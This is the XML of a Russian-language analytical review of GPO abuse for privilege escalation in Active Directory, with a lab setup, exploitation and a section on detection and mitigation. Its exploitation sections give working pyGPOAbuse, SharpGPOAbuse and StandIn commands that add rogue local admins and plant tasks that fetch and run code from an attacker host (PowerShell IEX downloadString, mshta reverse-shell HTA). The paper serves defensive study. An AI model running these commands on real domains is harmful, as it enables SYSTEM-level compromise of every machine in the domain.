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ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Злоупотребление объектами групповой политики (GPO Abuse):</w:t>
        <w:br/>
        <w:t>эксплуатация уязвимых разрешений и меры обнаружения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Аналитический обзор эскалации привилегий в среде Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Аннотация. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>В работе анализируется злоупотребление объектами групповой политики (Group Policy Objects, GPO) в Active Directory. Показано, что любой доменный пользователь с правом записи в GPO, связанный с чувствительным подразделением, способен добиться исполнения произвольного кода в контексте SYSTEM на всех затронутых машинах, включая контроллеры домена. Систематизированы перечисление уязвимых GPO (BloodHound, DACL) и техники эксплуатации (pyGPOAbuse, SharpGPOAbuse, StandIn). Основное внимание уделено высокоточным индикаторам и мерам обнаружения и противодействия.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Ключевые слова: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>информационная безопасность; Active Directory; объекты групповой политики; GPO abuse; эскалация привилегий; DACL; SYSVOL; Tier 0.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>1. Введение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Объекты групповой политики — основа централизованного управления конфигурацией в Active Directory: администраторы развёртывают настройки реестра, сценарии, программное обеспечение и запланированные задачи на множество машин. Эта централизованная сила превращается в серьёзный риск эскалации при некорректно настроенных правах записи. Предпосылка атаки: доменный пользователь с правом записи в GPO, связанный с чувствительным подразделением, может внедрить код, исполняемый в контексте SYSTEM на каждой затронутой машине, вплоть до контроллеров домена. Единственная ошибка в списке управления доступом (ACL) оборачивается исполнением кода в масштабе домена. Цель работы — систематизировать технику с позиции защитника и меры её обнаружения.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>2. Испытательный стенд и исходные условия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Контроллер домена — DC.ignite.local (192.168.1.11), лес ignite.local; атакующий узел — Kali Linux (192.168.1.17). Скомпрометированная учётная запись raj — рядовой доменный пользователь без привилегированных членств, но входящий в группу Remote Management Users (доступ по WinRM). Уязвимость обусловлена исключительно делегированным правом записи в GPO — типичный сценарий избыточного делегирования службе поддержки. В командах пароли заменены плейсхолдерами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>3. Перечисление уязвимых GPO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.1. Сбор данных BloodHound для выявления рёбер управления объектами (WriteOwner, WriteDacl, GenericWrite):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bloodhound-python -u raj -p &lt;password&gt; -ns 192.168.1.11 -d ignite.local -c all</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В результате выявляется уязвимый объект «Vuln GPO» с идентификатором GUID, необходимым для pyGPOAbuse. 3.2. Ручная проверка: в консоли управления групповыми политиками на вкладке Delegation наличие непривилегированного пользователя с правом «Edit settings, delete, modify security» указывает на уязвимость.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>4. Эксплуатация: pyGPOAbuse (сетевая атака с Linux)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Развёртывание инструмента:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git clone https://github.com/hackndo/pyGPOAbuse.git &amp;&amp; cd pyGPOAbuse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python3 -m virtualenv .venv &amp;&amp; source .venv/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python3 -m pip install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Добавление локального администратора: внедряется немедленная запланированная задача, создающая учётную запись и включающая её в группу администраторов. Доступ проверяется по WinRM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python pygpoabuse.py ignite.local/raj:'&lt;password&gt;' -gpo-id "&lt;gpo-guid&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>evil-winrm -i 192.168.1.11 -u john -p &lt;new-password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.3. Обратная оболочка через PowerShell при следующем обновлении политики:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>python pygpoabuse.py ignite.local/raj:'&lt;password&gt;' -gpo-id "&lt;gpo-guid&gt;" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  -powershell -command "IEX(New-Object Net.webclient).downloadString(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    'http://192.168.1.17/run.txt')"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>5. Эксплуатация: SharpGPOAbuse (с плацдарма на Windows)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Доставка через WinRM и три варианта воздействия: сценарий входа, немедленная задача, постоянный локальный администратор:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>evil-winrm -i 192.168.1.11 -u raj -p &lt;password&gt;   # upload SharpGPOAbuse.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.\SharpGPOAbuse.exe --AddUserScript --ScriptName Startup.bat \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  --ScriptContents "mshta http://192.168.1.17/file.hta" --GPOName "VULN GPO"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.\SharpGPOAbuse.exe --AddComputerTask --TaskName "System-Update" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  --Author ignite\administrator --Command "powershell" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  --Arguments "mshta http://192.168.1.17/file.hta" --GPOName "VULN GPO"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount raj --GPOName "VULN GPO"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>gpupdate /force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Полезная нагрузка .hta формируется через msfvenom (windows/x64/shell_reverse_tcp, формат hta-psh). Членство в группе локальных администраторов через Restricted Groups сохраняется после перезагрузки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>6. Эксплуатация: StandIn (альтернатива для обхода сигнатур)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Иной .NET-инструмент с той же функциональностью (задача в контексте компьютера и локальный администратор на другом GPO):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.\StandIn_v13_Net45.exe --gpo --filter "VULN GPO" --tasktype computer \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  --taskname Badtask --author "IGNITE\Administrator" --command "powershell" \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  --args "mshta http://192.168.1.17/file.hta"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:firstLine="0" w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="222222"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.\StandIn_v13_Net45.exe --gpo --filter "VULN-GPO1" --localadmin sanjeet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>7. Обнаружение и меры противодействия</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Высокоточные индикаторы. Мониторинг LDAP (событие 5136): изменения атрибута gPCMachineExtensionNames, появление GUID расширения Restricted Groups ({827D319E-6EAC-11D2-A4EA-00C04F79F83A}), рост versionNumber у GPO вне процесса управления изменениями. Целостность SYSVOL: создание или изменение ScheduledTasks.xml, GptTmpl.inf, Groups.xml, появление новых сценариев в папках startup/logon. Телеметрия процессов: gpupdate.exe перед неожиданным созданием задачи, порождение mshta.exe из планировщика, powershell.exe -EncodedCommand под svchost.exe; сигнатуры pyGPOAbuse/SharpGPOAbuse/StandIn и массовые LDAP-запросы ACL, характерные для BloodHound.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Меры защиты. Минимальные привилегии на DACL каждого GPO (аудит вкладки Delegation, удаление прав редактирования у непривилегированных субъектов; инструменты PingCastle, Purple Knight, Get-GPPermission); многоуровневое администрирование (учётные записи рабочих станций не должны иметь прав записи на GPO уровня Tier 0; членство в Remote Management Users — через PIM/JIT, а не постоянно); минимизация области связывания (привязка к наиболее специфичному подразделению, а не к корню домена); эшелонированная защита (LAPS, ограничение Group Policy Preferences Scheduled Tasks, обязательная подпись SMB, сокращение поверхности NTLM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>8. Заключение</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Злоупотребление GPO превращает единственную ошибку в ACL в исполнение кода в контексте SYSTEM в масштабе домена, включая контроллеры домена. Требуемая квалификация невысока: низкопривилегированный плацдарм, одно некорректное делегирование и любой из инструментов pyGPOAbuse, SharpGPOAbuse или StandIn. Защитный принцип: право записи в GPO является привилегией уровня Tier 0 и должно управляться как таковое. Строгое делегирование, узкие области связывания, непрерывный аудит DACL и многоуровневая телеметрия SYSVOL/LDAP превращают скрытую компрометацию в обнаруживаемое и обратимое событие.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>Список источников</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. hackndo. pyGPOAbuse: a partial Python implementation of SharpGPOAbuse. GitHub repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. FSecureLABS. SharpGPOAbuse; FuzzySecurity. StandIn. GitHub repositories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. SpecterOps. BloodHound: Active Directory attack path analysis. Documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. MITRE ATT&amp;CK. Domain Policy Modification: Group Policy Modification (T1484.001).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="0" w:left="454"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. Microsoft. Securing Group Policy and tiered administration (Tier 0) guidance; LAPS documentation.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616"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  <w:ind w:firstLine="567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